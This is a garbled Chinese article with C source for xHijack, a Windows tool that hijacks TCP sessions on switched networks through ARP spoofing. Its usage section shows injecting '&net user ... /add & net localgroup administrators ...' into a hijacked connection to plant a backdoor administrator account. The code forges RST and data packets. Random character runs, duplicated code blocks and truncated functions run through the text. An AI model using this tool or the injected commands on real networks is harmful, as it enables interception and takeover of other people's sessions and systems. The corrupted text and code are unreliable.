再谈交换环境下的会话劫持(For windows2000)

韩冰

第一步是开启IP Routing的功能，修改注册表
; p1 X+ r. Z* ]HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\IPEnableRouter为0x1，重启系统即可。
第二步是ARP欺骗，具体原理我就不说了。
第三步就是开始劫持啦。
9 M% a* w7 ?2 E2 u+ H0 ~2 C  s" D$ d
我写了个程序xHijack可以实现第二、三步功能，使用如下:

Usage: xHijack ServerSide ClientSide

$ c( k4 j+ e# P下面根据三种不同的情况分别说明如何输入参数：
; w, n: E( j" Y6 Y<1>服务器、客户端、劫持者处于同一局域网，接在同一交换机上（或交换机级连？）。
; a) Q, z% [7 ?* c假如服务器的IP是192.168.0.2，客户端的IP是192.168.0.3，提供如下参数给xHijack即可
% K0 O8 k9 _9 _) R$ |, E7 S/ mc:\>xHijack 192.168.0.2 192.168.0.3
劫持前数据流程：server <--> client
) }1 F2 @, ~' J1 L0 _+ W' s; N劫持后数据流程：server <--> hijacker <--> client
" k8 V6 N1 q; E2 T
7 q# I, w& }' G, z; f9 ?/ i& c<2>服务器、劫持者处于同一局域网，客户端处于别的网络。
& P( U- l! s9 w+ a3 m假如服务器IP是202.202.202.2，服务器的网关是202.202.202.1，提供如下参数
xHijack 202.202.202.2 202.202.202.1
; Q; H4 I9 k. Y+ Q劫持前数据流程：server <--> gw <--> routes <--> client
劫持后数据流程：server <--> hijacker <--> gw <--> routes <--> client
6 [1 U' d6 U3 t* j& A/ P
<3>客户端、劫持者处于同一局域网，服务器处于别的网络。
6 f* T. A) [' H" I假如客户端的IP是192.168.0.2，网关是192.168.0.1，提供如下参数
xHijack 192.168.0.1 192.168.0.2
劫持前数据流程：client <--> gw <--> routes <--> server
# V0 K) K2 K. z7 H, t3 p( M劫持后数据流程：client <--> hijacker <--> gw <--> routes <--> server
& n" l, |: p6 N0 d0 |
& m$ ^4 _2 k% k7 m输入两个参数后，会提示你选择网卡，然后会提示
l        <-- List all connections
: J, T$ J: t- t$ W8 ?+ [: F9 er x       <-- Reset the number x connection
) J6 x- t/ x% J% D) w( d6 ]. \0 Yw x       <-- Watch the number x connection
h x command   <-- Hijack the number x connection to execute command

list、reset、watch命令我就不解释了。
假如现在有如下连接
(1) 202.202.202.202:23 <--> 192.168.0.3:2345
7 ]5 J7 b. A* t: T5 m& V" {我们想要劫持这个连接运行我们的命令，输入
0 ]3 o. K0 F. h- P& zxHijack>h 1 "&net user ey4s hijack /add & net localgroup administrators ey4s /add"
4 d; s; P: T8 y! O$ n为什么命令前面要加&呢？假如客户刚发送一个字符p过去，我们不加&的话，服务器端接受到的就是
. B8 U9 p/ p% opnet user.....了，加了&后就成为p&net user.....，这样就不管前面客户输入了什么，我们的命令
/ I, a7 Q5 k! A: ]3 l都能够运行了。以上都假设服务器是windows 2000，unix下加什么字符，我不知道，我是unix白痴，呵呵。
% E5 F! w0 y6 m2 I
1 r8 \5 J$ P2 ^0 {$ _- v- ~. k9 F劫持的流程如下：
: y  @- O! i$ G) }<1>伪装成Server给Client发一个rst包
<2>伪装成Client给Server发了一个数据包
+ i8 N  H6 s! h! u: C<3>Server回一个ACK包给client
<4>因为Cleint的连接已经给我们reset掉了，所以client回一个rst包给server

这样的话，我们只能发一个伪造的包，但我想已经足够了。
想要一直劫持那个连接也可以，如下
8 |. D  N2 D$ v2 G<1>伪装成Server给Client发一个rst包
8 Z( i& q) w3 D' i6 M% M9 n+ \<2>欺骗Client，告诉它Server的MAC地址AAAAAAAAAAAA
<3>伪装成Client给Server发了一个数据包
<4>Server回一个ACK包给client
<5>Client回一个rst包给Server，但Server收不到，因为Client发到AAAAAAAAAAAA了，呵呵。
% x% S7 P: D6 Q( P. e  ~, L! V<6>然后Server发给Client的包都由我们来处理，包括给Server回ACK包等等。
* N& t8 C* ~* O+ ~% }/ c. }: D1 T
不过这样比较危险，在我们劫持的过程中，Client与Server的通讯始终是断开的。
% l6 Q/ @# N7 `
$ j& y1 z2 b$ M8 A
刚开始看TCP/IP协议，调程序调得头昏脑涨，说明也写的乱七八糟，呵呵，程序代码也可能存在很多问题，
还请各位多多指点。

8 `$ V/ [2 d4 ]4 Y2 D& s7 b/ C0 ]BTW:我没有空间，编译好的程序没地方放：（
; P% q; M7 o+ I9 j

2 S# X6 V' `) u, X
- z: r* N0 u4 {- p参考资料
<>交换环境下的会话劫持http://www.xfocus.net/article_view.php?id=375
<>交换网络中的嗅探和ARP欺骗http://www.xfocus.net/article_view.php?id=377


以下是程序代码
----------------------------------------------------------------------
9 Q$ O, c/ s# {' q8 t) N1 F/*-----------------------------------------------------------------------------
) n% {1 d3 a: C2 jFile      : xHijack.c
6 b. ^, W* W4 O; A+ yVersion      : 1.0
/ M( _, J( k7 KCreate at    : 2002/8/12
4 u2 `7 v9 A/ d5 z% j& VLast modifed at  : 2002/8/19
Author      : eyas
. A7 W1 g! v1 k: Z5 iEmail      : ey4s@21cn.com
HomePage    : www.ey4s.org
9 i2 l. G, \& X: d+ H5 e9 ?感谢refdom和shotgun发布的源代码，使我获益非浅。
6 d/ H7 o1 Y$ s  }. MIf you modify the code, or add more functions, please email me a copy.

6 d7 N) ^3 N5 f- d6 m备注:
9 A' @% P  }$ n2 f$ }<>没有考虑IP头、TCP头超过20字节的情况
<>没有考虑数据包分片的情况
: D  s& H: O- Z- z<>没有对截取到的TCP数据进行解码，如TELNET，虽然是明文传输，但是TCP数据里面包含了
显示格式、位置等信息，直接打印出来，显得很凌乱。但如果是IRC、SMTP、POP3等就没问
) _" G+ b; V1 `" W! D0 Q% k题了。
+ n, P  g9 h( S( o# y% X: |7 B: F
也许下一版本会修正这些问题，也许不会有下一版本了。
6 E8 O) H- M  U. u9 e( K
* S2 b& E- u4 q8 F; f( L8 t-----------------------------------------------------------------------------*/
#include
#include
#include
#include
. a# j+ i' d. v7 Y- |2 ~7 h#include
2 F6 z4 H3 ^8 `/ y#include
* R5 D2 w3 d: k, T#include
# Y- N; K% N- T3 z/ f
  y% H  ?/ ^" V#pragma comment (lib, "packet")
0 U$ b& m! |- f1 H#pragma comment (lib, "iphlpapi")
/ Y7 s6 |' q7 w: o) m#pragma comment (lib, "ws2_32")
9 l$ g) ]* s- g+ {' I2 K
/ N5 P5 L0 r9 ^" m& W#define Max_Num_Adapter 10
#define Max_Num_IPAddr  5
' x8 @6 J/ N) V# w6 r, _#define EPT_IP      0x0800      /* type: IP  */
5 I3 W4 u- W0 H' K#define ARP_HARDWARE  0x0001      /* Dummy type for 802.3 frames */
! d, K: ?6 |, Q: n: @#define EPT_ARP      0x0806      /* type: ARP */

#define  ACTION_NONE    0
7 d; o  i- g$ B- C9 f, s; P" f9 m#define  ACTION_WATCH  1
#define  ACTION_RESET  2
; S# w; C1 v( ~& }' u1 l#define ACTION_HIJACK  3
: l( B& ]" C5 u4 T4 [2 F( {$ ]* k
/*以1字节对齐*/
#pragma pack(1)
typedef struct _ehhdr
{
  unsigned char  DestMAC[6];
  unsigned char  SourceMAC[6];
3 T1 N  B8 C3 Y; l  unsigned short  EthernetType;
}EHHDR, *PEHHDR;

typedef struct _iphdr        //定义IP首部
, x& j1 r0 l2 a9 Y$ g7 W{
  unsigned char h_verlen;      //4位首部长度,4位IP版本号
  unsigned char tos;        //8位服务类型TOS
  unsigned short total_len;    //16位总长度（字节）
2 ]4 A  C/ f, ]2 w9 V  unsigned short ident;      //16位标识
  unsigned short frag_and_flags;  //3位标志位
  unsigned char ttl;        //8位生存时间 TTL
  unsigned char proto;      //8位协议 (TCP, UDP 或其他)
# M' I: L6 C- _  unsigned short checksum;    //16位IP首部校验和
  unsigned int sourceIP;      //32位源IP地址
5 X& w/ Y0 n1 ?& e  unsigned int destIP;      //32位目的IP地址
8 ?1 ^& b: y) H- g; u}IPHDR, *PIPHDR;

typedef struct _tcphdr        //定义TCP首部
) |: D. c' G  _0 z) U6 X{
  USHORT th_sport;        //16位源端口
  USHORT th_dport;        //16位目的端口
  unsigned int th_seq;      //32位序列号
  unsigned int th_ack;      //32位确认号
. ]5 ^' t/ s6 Z) J  unsigned char th_lenres;    //4位首部长度/6位保留字
5 X4 l! g: N3 x  unsigned char th_flag;      //6位标志位
' Q! F0 T  g0 U- S  USHORT th_win;          //16位窗口大小
8 J+ j; I. }6 @  USHORT th_sum;          //16位校验和
: e2 y8 L8 Y5 V2 l: T  USHORT th_urp;          //16位紧急数据偏移量
}TCPHDR, *PTCPHDR;

; M9 p! X. W# Q! htypedef struct _psdhdr        //定义TCP pseudo header
/ T) c% P* ~0 W2 u1 B" Y0 @, d{               
  unsigned long saddr;
  unsigned long daddr;
. B) \0 V' G- t/ L% \1 l  char mbz;
  char ptcl;
' ]! s* U) t' E; d  unsigned short tcpl;
}PSDHDR, *PPSDHDR;
0 {& p. j& T3 f6 e/ O( x
- _# m: t) ]2 A5 N  n; |typedef struct _arphdr
{
) }, I7 j" J& K/ S  unsigned short  HrdType;//硬件类型
  unsigned short  ProType;//协议类型
  unsigned char  HrdAddrlen;//硬件地址长度
  unsigned char  ProAddrLen;//协议地址长度
  unsigned short  op;//operation
  unsigned char  SourceMAC[6];/* sender hardware address */
2 W7 Z. n* k0 L9 `( ?+ c  unsigned long  SourceIP;/* sender protocol address */
- ?, q+ W9 a8 |7 B+ o% d, ^) V- U, C  unsigned char  DestMAC[6];/* target hardware address */
: e% H& ^% K2 W  unsigned long  DestIP;/* target protocol address */
9 K% f! M# S; n  @# T; K}ARPHDR, *PARPHDR;

; f% M) b5 T5 w9 z" Etypedef struct _ArpPacket
8 e) }6 f: H* f) m5 i{
$ A* i, i5 ^8 r* \- z* L0 a5 U  EHHDR  ehhdr;
" J& S8 C& T, j! ]3 j8 P& C  ARPHDR  arphdr;
# G$ D/ P1 v- a& G; {+ d9 k( `}ARPPACKET, *PARPPACKET;

typedef struct _tcppacket
0 A% `$ e! @  g( l{
4 X5 q: [( K# _- F. |  EHHDR  ehhdr;
7 L2 }$ N' J9 l% z) ~2 a* s* J  IPHDR  iphdr;
  TCPHDR  tcphdr;
}TCPPACKET, *PTCPPACKET;

: {3 y' m- I& u; g; R! T% s9 u; Btypedef struct _conninfo
9 w  ~, x; S3 a8 k: B/ ]/ \{
  DWORD  dwServerIP;
  H( D# l3 a) r% _  USHORT  uServerPort;
  DWORD  dwClientIP;
5 r5 c. y- {# |4 H1 S  USHORT  uClientPort;
1 j8 a; F% g3 q5 N# M! m% A  DWORD  ident;//标识
$ G. E$ Q! c& k6 B  BOOL  bActive;
  struct  _conninfo  *Next;
}CONNINFO, *PCONNINFO;
# G* L; q. a' L; v% l, g
//定义全局变量

韩冰

unsigned int  g_ServerSideIP,
% R; `0 c2 z* n3 b        g_ClientSideIP,
* ]  c& X- \5 l* f& W0 O% V6 g3 E        g_OwnIP[Max_Num_IPAddr],//本机IP地址列表
+ o5 D9 F6 v4 j; F+ n        g_TotalIP = 0;//
5 m4 x) [8 I/ B6 v, O) Xunsigned char  g_szOwnMAC[6];//本机MAC地址
unsigned char  g_szClientSideMAC[6];
unsigned char  g_szServerSideMAC[6];
5 Q4 }( S  L$ j  a+ J4 j9 K( Lchar      g_szTcpFlag[6] = {'F','S','R','P','A','U'};//TCP标志位
LPADAPTER    g_lpAdapter;
//1 and 2 is arp spoof thread, 3 is recv packets thread, 4 is interface thread
2 X+ k+ F- \: C" v0 d8 dHANDLE      g_hThread[4];
char      g_szCommand[128];//command to execute after hijack
DWORD      g_dwAction;//action type
DWORD      g_dwCtrlConn;//action 所控制连接的标识
# u* J. e# y% D/ w5 t- L+ A$ KDWORD      g_ident;//节点标识，递增
PCONNINFO    g_pCurrCtrlConn = NULL,//action当前所控制的连接的信息结构指针
        g_pConnHead = NULL,
0 R3 W( r2 U; c8 ?( v" o& {        g_pConnLast = NULL;
7 J& G2 O, o3 e. q: zchar      g_szSendPacketBuf[1514];
) D1 t9 @: k( wLPPACKET    g_lpSendPacket;
//函数
  B7 C. a9 L' |* S! I# mvoid      usage(void);
void      ShowPacketMoreInfo(PTCPPACKET, USHORT, BOOL);
void      ListAllConnection();//列出当前所有的连接
void      ResetActionAllFlag();
USHORT      checksum(USHORT *, int);
% t0 z3 U6 _: R; E: LBOOL      GetMACAddr(DWORD DestIP, char *pMAC);//取得目标IP的MAC地址
BOOL      IsACKPacket(unsigned char);//判断是不是一个纯ack包
- j8 B7 R6 Z, D' \/ SLPADAPTER    InitAdapter();//初始化一些参数和全局变量
BOOL      SendRstPacket(unsigned int, unsigned int);//伪装成server给cilent发送rst包
BOOL      SendHiJackPacket(PTCPPACKET);//伪装成client给server发送我们的包
/ f9 |; K% a6 _. e- cDWORD      GetConnNum(char *, DWORD, DWORD *);
DWORD      CtrlConnInfoLink(DWORD, USHORT, DWORD, USHORT, BOOL, BOOL);
% [. k, Q, r4 a4 I' Z2 ]2 vDWORD  WINAPI  ArpSpoofThread(LPVOID);//进行arp欺骗的函数
DWORD  WINAPI  AnalysePacketsThread(LPVOID);//分析处理接收到的包
DWORD  WINAPI  InterfaceThread(LPVOID);//
BOOL  WINAPI  CtrlEvent(DWORD);



int main(int argc, char **argv)
; s( w- \, L% j- S' B{
  struct    bpf_stat stat;
  int      i;

  usage();
- K# u$ D, K% v6 A% i2 G  V* G  if (argc != 3) return 0;
  //取得参数
  g_ServerSideIP = inet_addr(argv[1]);
& n" O% Q8 G/ }+ R: Z  g_ClientSideIP = inet_addr(argv[2]);
, I3 _; u0 w6 c/ E0 R' C& f7 @  //初始化adapter & 一些全局变量
  g_lpAdapter = InitAdapter();
  if(!g_lpAdapter) return 0;
  //get ServerSide MAC & ClientSide MAC
  if(!GetMACAddr(g_ServerSideIP, g_szServerSideMAC)) return 0;
) R9 l) m* i$ M& f+ g  if(!GetMACAddr(g_ClientSideIP, g_szClientSideMAC)) return 0;
+ c9 Y& ^; y. a7 z  //create arp spoof thread     
. b8 _  m. j. W$ q2 t, S) A  i = 1;
  g_hThread[0] = CreateThread(NULL, 0, ArpSpoofThread, &i, 0, 0);
  Sleep(500);
  i = 2;
  g_hThread[1] = CreateThread(NULL, 0, ArpSpoofThread, &i, 0, 0);
) ^, W9 N. R. _' |  //create analyse packet thread
- a% ^8 T' `; f  g_hThread[2] = CreateThread(0, 0, AnalysePacketsThread, NULL, 0, 0);
  //create interface thread
% W+ \, w: a" S& t3 Y) @6 t9 a, C! }, ^  g_hThread[3] = CreateThread(0, 0, InterfaceThread, NULL, 0, 0);
  //set console ctrl handle
' g- e, j6 z: K* D* a% x  if(!SetConsoleCtrlHandler(CtrlEvent, TRUE))
7 K/ \$ t5 w; {4 f4 K  {
    printf("SetConsoleCtrlHandler error:%d\n", GetLastError());
' J5 a: n- R7 p$ S6 l8 e/ `    return 0;
  }
  //wait for any thread exit
; X* m- f5 j# n- y( _! v  WaitForMultipleObjects(4, g_hThread, FALSE, INFINITE);
3 h2 R% b' t2 x) C  //print the capture statistics
( p" Y8 g, d6 _3 _9 X: j7 t9 W, K  if(PacketGetStats(g_lpAdapter, &stat) == FALSE)
. k+ v+ ?6 z5 T0 o* h: M( _    printf("Warning: unable to get stats from the kernel!\n");
  else
    printf("\n\n%d packets received.\n%d Packets lost\n",stat.bs_recv,stat.bs_drop);
  //free resource   
  PacketFreePacket(g_lpSendPacket);
6 G/ Q& x, B4 m. |1 P# h' t# t  PacketCloseAdapter(g_lpAdapter);
  return 0;
5 v6 L# r9 `$ P% b}
: b. l3 E7 E" X
//
//功能：重置所有于ACTION有关的标志
//

韩冰

unsigned int  g_ServerSideIP,
$ h: S; i$ p- d4 t: J        g_ClientSideIP,
1 q( S, h1 r% X; M  _        g_OwnIP[Max_Num_IPAddr],//本机IP地址列表
        g_TotalIP = 0;//
) P8 D0 T5 v1 k5 Z2 U, o5 funsigned char  g_szOwnMAC[6];//本机MAC地址
unsigned char  g_szClientSideMAC[6];
' l% F, n0 P  [  x9 runsigned char  g_szServerSideMAC[6];
char      g_szTcpFlag[6] = {'F','S','R','P','A','U'};//TCP标志位
4 L5 c7 V! `& c- c3 n$ [LPADAPTER    g_lpAdapter;
//1 and 2 is arp spoof thread, 3 is recv packets thread, 4 is interface thread
HANDLE      g_hThread[4];
  e& n) J3 e# g) X# \char      g_szCommand[128];//command to execute after hijack
DWORD      g_dwAction;//action type
DWORD      g_dwCtrlConn;//action 所控制连接的标识
3 T- j% ~! }3 i2 G9 g  S+ LDWORD      g_ident;//节点标识，递增
; B. y7 b7 y7 D) F1 P& d' aPCONNINFO    g_pCurrCtrlConn = NULL,//action当前所控制的连接的信息结构指针
        g_pConnHead = NULL,
        g_pConnLast = NULL;
. D' y5 o  q, L" O0 y- xchar      g_szSendPacketBuf[1514];
LPPACKET    g_lpSendPacket;
//函数
% J& q4 \8 q. |; P0 \4 Fvoid      usage(void);
7 P/ a/ j9 A( c0 H6 K* E2 Vvoid      ShowPacketMoreInfo(PTCPPACKET, USHORT, BOOL);
" P) N7 b3 d* [( K* Qvoid      ListAllConnection();//列出当前所有的连接
void      ResetActionAllFlag();
5 ^; C" `: O, qUSHORT      checksum(USHORT *, int);
BOOL      GetMACAddr(DWORD DestIP, char *pMAC);//取得目标IP的MAC地址
BOOL      IsACKPacket(unsigned char);//判断是不是一个纯ack包
LPADAPTER    InitAdapter();//初始化一些参数和全局变量
1 F1 p3 l0 L+ k, u  N: yBOOL      SendRstPacket(unsigned int, unsigned int);//伪装成server给cilent发送rst包
* b# A4 a% M& y6 a9 nBOOL      SendHiJackPacket(PTCPPACKET);//伪装成client给server发送我们的包
' U$ C& t" d; B: Z1 J$ S6 rDWORD      GetConnNum(char *, DWORD, DWORD *);
* k8 Q5 q: t5 {! ]8 N8 aDWORD      CtrlConnInfoLink(DWORD, USHORT, DWORD, USHORT, BOOL, BOOL);
( G: z% W% ]" m9 m' z& `; ?) hDWORD  WINAPI  ArpSpoofThread(LPVOID);//进行arp欺骗的函数
) m7 {) }$ F9 l) HDWORD  WINAPI  AnalysePacketsThread(LPVOID);//分析处理接收到的包
5 ^1 j# y* ^7 {5 x: TDWORD  WINAPI  InterfaceThread(LPVOID);//
BOOL  WINAPI  CtrlEvent(DWORD);
  s6 W$ {4 a' ^9 k8 U


int main(int argc, char **argv)
, p: w$ u4 C4 a{
  struct    bpf_stat stat;
  int      i;
! q1 v' I. A4 p$ u( C9 q
  usage();
  if (argc != 3) return 0;
  //取得参数
  g_ServerSideIP = inet_addr(argv[1]);
  g_ClientSideIP = inet_addr(argv[2]);
6 _9 N0 b' @+ T' Y) c  //初始化adapter & 一些全局变量
; S; Z! ?/ I2 X. M  g_lpAdapter = InitAdapter();
! W7 k6 O4 V# ?) \  if(!g_lpAdapter) return 0;
/ q; d* k# ]2 A4 Z$ e( B  //get ServerSide MAC & ClientSide MAC
( c$ F  ~  H  x( X8 v  if(!GetMACAddr(g_ServerSideIP, g_szServerSideMAC)) return 0;
  if(!GetMACAddr(g_ClientSideIP, g_szClientSideMAC)) return 0;
  //create arp spoof thread     
& [9 ^# n- C* V' L! h  i = 1;
  g_hThread[0] = CreateThread(NULL, 0, ArpSpoofThread, &i, 0, 0);
# o; Z7 D& e1 v" R4 m  Sleep(500);
  i = 2;
  g_hThread[1] = CreateThread(NULL, 0, ArpSpoofThread, &i, 0, 0);
  c0 ]4 J/ C) E: F- ^  //create analyse packet thread
  g_hThread[2] = CreateThread(0, 0, AnalysePacketsThread, NULL, 0, 0);
  //create interface thread
  g_hThread[3] = CreateThread(0, 0, InterfaceThread, NULL, 0, 0);
  //set console ctrl handle
  if(!SetConsoleCtrlHandler(CtrlEvent, TRUE))
  {
    printf("SetConsoleCtrlHandler error:%d\n", GetLastError());
- s0 k5 ]# q; Y" x5 m7 _    return 0;
  }
9 A/ b; |5 y- c$ s$ A' s  //wait for any thread exit
  WaitForMultipleObjects(4, g_hThread, FALSE, INFINITE);
  //print the capture statistics
) f: `4 }! B" T, {- s  if(PacketGetStats(g_lpAdapter, &stat) == FALSE)
    printf("Warning: unable to get stats from the kernel!\n");
9 ~' \! b5 M3 n/ P+ S# a) v' I0 O  else
5 e6 j9 B; t$ `" T( o    printf("\n\n%d packets received.\n%d Packets lost\n",stat.bs_recv,stat.bs_drop);
  //free resource   
0 t  E4 _7 d6 I& I1 g! a0 ^  PacketFreePacket(g_lpSendPacket);
; ~/ c% |5 z$ v1 u  PacketCloseAdapter(g_lpAdapter);
  return 0;
6 ~8 o+ w$ c3 L' k. p% j}
' [" ^1 ?2 E6 q4 n' ^
//
: K, P0 Q/ C0 F- D- |/ t//功能：重置所有于ACTION有关的标志
" \7 U/ X, e# d) q0 h9 X! ], J& b//

韩冰

void ResetActionAllFlag()
{
  s9 Z7 q  Y" B1 z  g_dwCtrlConn = 0;
  g_pCurrCtrlConn = NULL;
  g_dwAction = ACTION_NONE;
}
' w' {$ Y3 f3 B7 o4 {( s+ b; m
//
//功能：处理Ctrl+C和Ctrl+Break事件
6 I7 ^: v7 K% B% d//
BOOL WINAPI CtrlEvent(DWORD dwCtrlType)
" i6 a, X- Q; c8 b4 ^( i* j6 X{
  switch(dwCtrlType)
  {
& @$ \: L: S# T4 }# @( n* U    case CTRL_BREAK_EVENT:
4 C  P) L! w' T' n  {- `9 o# P! \      //reset action all flag
      ResetActionAllFlag();
/ p: u- ?0 ^" H# Y1 W      break;
' J7 {$ K% t3 F. e$ s    case CTRL_C_EVENT:
      //terminate all thread
. c" z" B& V2 p      TerminateThread(g_hThread[0], 0);
1 ]  a& e/ P# i      TerminateThread(g_hThread[1], 0);
4 M# }  b; |/ c, `$ t6 ^) b% l      TerminateThread(g_hThread[2], 0);
      TerminateThread(g_hThread[3], 0);
( x; n% Q. D4 K) y8 I" M! |      break;
    default:
. @8 N4 E) k" w9 w      break;
  }
  return TRUE;
}

" u# [4 ~, e9 ]+ j! S8 _//
4 Z2 a, r: M8 v& F  N0 i- a: c//功能：处理用户输入
//
" ^; S" ^) D, u  @. TDWORD GetConnNum(char *szStr, DWORD dwLen, DWORD *lpCommandPos)
) L4 ^+ g+ P" ~* m3 E{
3 O( B' {/ C# f! W# V9 H9 U0 X  DWORD  i;
' W- U0 X2 _3 ]3 f+ ~  char  szBuff[16];

2 L' Z; y& v6 Y" T, e/ b9 \; |  *lpCommandPos = 0;
: Z# p8 \% e% s  for(i=0; i<15, i代码比较乱
//
7 n1 R2 g5 O- o$ T! F) KDWORD WINAPI InterfaceThread(LPVOID lp)
3 [' Y; W6 g6 u' B. p{
5 _% Y$ ~7 l; G- D1 o5 R  char  szHelp[] =  "l\t\t<-- List all connections\n"
! w. A, U. H6 g, K9 J' ?            "r x\t\t<-- Reset the number x connection\n"
            "w x\t\t<-- Watch the number x connection\n"
            "h x command\t<-- Hijack the number x connection to execute command\n"
* b5 X3 B5 x; _$ m7 O  d  \            "[Note]\n"
            "Ctrl+Break to clear all action\n"
            "Ctrl+C to exit\n";
  char  szPrompt[] = "\nxHijack>";
  char  szBuffer[128];
0 p. W  J" \1 W- M5 v* K  DWORD  dwPos;
  PCONNINFO  pTmp;

  while(1)
  G# ^! u# {# _& n4 D9 e, j  {
    gets(szBuffer);//不考虑buffer overflow
8 v: n  R+ o, x, h2 Q2 [: @$ z    switch(szBuffer[0])
    {
      case 'l':
      case 'L':
        ListAllConnection();
        break;
7 X: N+ S4 J( B! v4 @* v6 ^      case 'r':
      case 'R':
        if(strlen(szBuffer) >2)
        {
          g_dwCtrlConn = GetConnNum(&szBuffer[2], strlen(szBuffer) - 2, &dwPos);
          g_dwAction = ACTION_RESET;
: E  W7 v; M3 g, S) R- S# |) L        }
        else printf("%s", szHelp);
        break;
      case 'w':
' X$ [0 L# N7 B+ `5 h/ Q& j      case 'W':
        if(strlen(szBuffer) > 2)
7 ~9 e3 T5 j4 ]5 v        {
          g_dwCtrlConn = GetConnNum(&szBuffer[2], strlen(szBuffer) - 2, &dwPos);
          g_dwAction = ACTION_WATCH;
( p! p. i1 a( _2 E0 V        }
        else printf("%s", szHelp);
        break;
      case 'h':
      case 'H'://h 1 xxx
! [' \# ~& \& ^" x! Y, Z        if(strlen(szBuffer) > 5)
        {
+ d) o9 }5 ~7 m( x. F. Y; Q          g_dwCtrlConn = GetConnNum(&szBuffer[2], strlen(szBuffer) - 2, &dwPos);
9 H/ z, e" b$ A0 x0 ?) x          //如果command第一个字符是'或"
8 z& x$ F( V3 t6 @          if( (szBuffer[2+dwPos+1] == '\'') || (szBuffer[2+dwPos+1] == '\"') )
+ ~) q2 M5 W6 R: }9 x          {
            strncpy(g_szCommand, &szBuffer[2+dwPos+1+1], sizeof(g_szCommand) - 3);
- J- r1 c8 h/ S: B/ R1 ^            g_szCommand[strlen(g_szCommand) - 1] = 0x0;//去掉最后一个'或"
: S5 S4 z3 b  ]3 N          }
9 Z# t( r) O4 U! y$ ^6 |8 }. G          else strncpy(g_szCommand, &szBuffer[2+dwPos+1], sizeof(g_szCommand) - 3);
          strcat(g_szCommand, "\x0D\x0A");
/ R& t- W( {& e( d, K1 W1 h          g_dwAction = ACTION_HIJACK;
: |, W) E7 R; s; P% I1 b        }
        else printf("%s", szHelp);
9 t/ v5 ?4 X4 A  _        break;
      default:
; C% f$ c0 M" V6 L8 B  E, s        printf("%s", szHelp);
        break;
7 o; l* T- x0 w& n& R6 e    }//end of switch
& s' u! N! s7 \  S5 p    //find the specify ident's struct point
8 Z* z% ^( i  i! q0 Q2 o7 P" C# p    if( (g_dwCtrlConn) && (g_dwAction) )
    {
* O, I* R% i9 R7 u3 T- d' W2 B      g_pCurrCtrlConn = NULL;
      pTmp = g_pConnHead;
( L% \6 {' T1 Z      while(pTmp)
      {
        if((pTmp->ident == g_dwCtrlConn) && (pTmp->bActive) )
  G, w; ]; e, y* I3 ?        {
          g_pCurrCtrlConn = pTmp;
* N1 D: Q2 I  K: q+ _          break;
7 O9 p1 s. W! ]        }
        pTmp = pTmp->Next;
* @3 I  U& r$ j" ?9 q7 @& o      }
) `$ q' q$ D2 o. v      if(!g_pCurrCtrlConn)
      {
  U4 ?; c4 d7 I        printf("Can't find the number %d connection.\n", g_dwCtrlConn);
        //reset action all flag
        ResetActionAllFlag();      
+ u& n/ ]* F6 M4 L7 H  k      }
: x# S0 @9 y8 J0 j' B' G( o    }
    if(!g_dwCtrlConn) ResetActionAllFlag();
    //显示当前用户所期望的动作
' _, O* ]/ f+ J. F    printf("\nCurrentAction:");
    switch(g_dwAction)
    {
+ u7 C, t# K. W! o. J- a6 W      case ACTION_WATCH:
        printf("ACTION_WATCH");
        break;
+ c& \- {* |8 \) d+ S/ x4 U* u) j      case ACTION_RESET:
% l* Y2 Y( B& I( {# q        printf("ACTION_RESET");
        break;
      case ACTION_HIJACK:
( J! g" x2 T, v: y* d        printf("ACTION_HIJACK");
        break;
7 ^0 V( h& V1 s0 s% z- ~9 N6 d      default:
        printf("ACTION_NONE");
        break;
    }
( I1 ^: j) X' d- D! F  n: m1 s5 g7 l4 V    printf("\tCurrentCtrlConn:%d%s", g_dwCtrlConn, szPrompt);
3 B2 g7 I# Y' `  }//enf of while
* |) Q9 [+ A  |) g  return 0;
}

韩冰

// //功能：列出当前所有连接 # O$ v/ t2 }0 C5 Y9 C2 U+ V// void ListAllConnection() { 0 V- b- z+ Z% P PCONNINFO pTmp; $ m/ a5 b# A z& K0 `; S3 S SOCKADDR_IN saDest, saSource; pTmp = g_pConnHead; $ y9 I- K1 _+ ?5 O: v% A3 C6 ~ while(pTmp) : l q( x: Y: e9 S& y1 p { * R- d: U- C+ s5 ~ if(pTmp->bActive) { saSource.sin_addr.s_addr = pTmp->dwServerIP; 0 n# L' f6 I. H; t0 [5 K: u saDest.sin_addr.s_addr = pTmp->dwClientIP; printf("(%d) %s:%d <--> ", pTmp->ident, inet_ntoa(saSource.sin_addr), ntohs(pTmp->uServerPort)); + Y" V/ G( O7 i: Q2 o5 L* Z printf("%s:%d\n", inet_ntoa(saDest.sin_addr), ntohs(pTmp->uClientPort)); ' @! I' ?. u, u5 f: Q8 M } ; e5 Y/ N8 o# F/ n, U+ { pTmp = pTmp->Next; # B! G1 Z/ M' Y0 Z; | } } & o7 z5 W: ^) T" n* p : c; d: e- U* |+ V// //功能：初始化一些数据，取得指定网卡的MAC地址和所有IP地址 / z! z' \3 m* B// LPADAPTER InitAdapter() { 5 N$ R; D% ]' v6 {: _1 S' h( ? LPADAPTER lpAdapter; static char AdapterList[Max_Num_Adapter][1024]; 8 g! h) K$ L' ^% Z# L7 { char szSelectAdapterName[512]; - j' b. N7 B9 m7 t WCHAR AdapterName[2048]; WCHAR *temp,*temp1; ULONG AdapterLength = 1024; int iAdapterNum = 0; ; G' A3 m" |+ W" I int iRetCode, i; int iAdapter = 0; ULONG ulLen = 0; DWORD dwRet; PIP_ADAPTER_INFO pAdapterInfo = NULL, pTmp; + n- k" B$ d: v5 `# f! K- K) @, h PIP_ADDR_STRING pIPAddr; //Get The list of Adapter if(PacketGetAdapterNames((char*)AdapterName, &AdapterLength) == FALSE) : G/ h* P: E7 h/ l/ |+ _- C { 4 J' s+ D( h$ t1 ?4 o printf("Unable to retrieve the list of the adapters!\n"); ( [/ [* ~, G9 X9 Q* p$ q: N return 0; 6 n4 C1 E) Q: }/ S } temp = temp1 = AdapterName; i = 0; while ((*temp != '\0')||(*(temp-1) != '\0')) ' N1 s. D) r5 i R" Q1 H { if (*temp == '\0') 8 e$ [1 Y- A7 Q8 E { 3 W1 L4 L5 j1 e% u! H5 z memcpy(AdapterList,temp1,(temp-temp1)*2); ' d/ J) x( P* Y5 g printf("%d - %S\n", i+1, AdapterList); $ l7 F" {+ u+ B& D: K temp1=temp+1; i++; } temp++; } , ]0 }& [/ X' V& F9 ? //choose adapter while((iAdapter <= 0) || (iAdapter > i)) { printf("\nPlease choose your Adapter:"); " q8 o: @* ?8 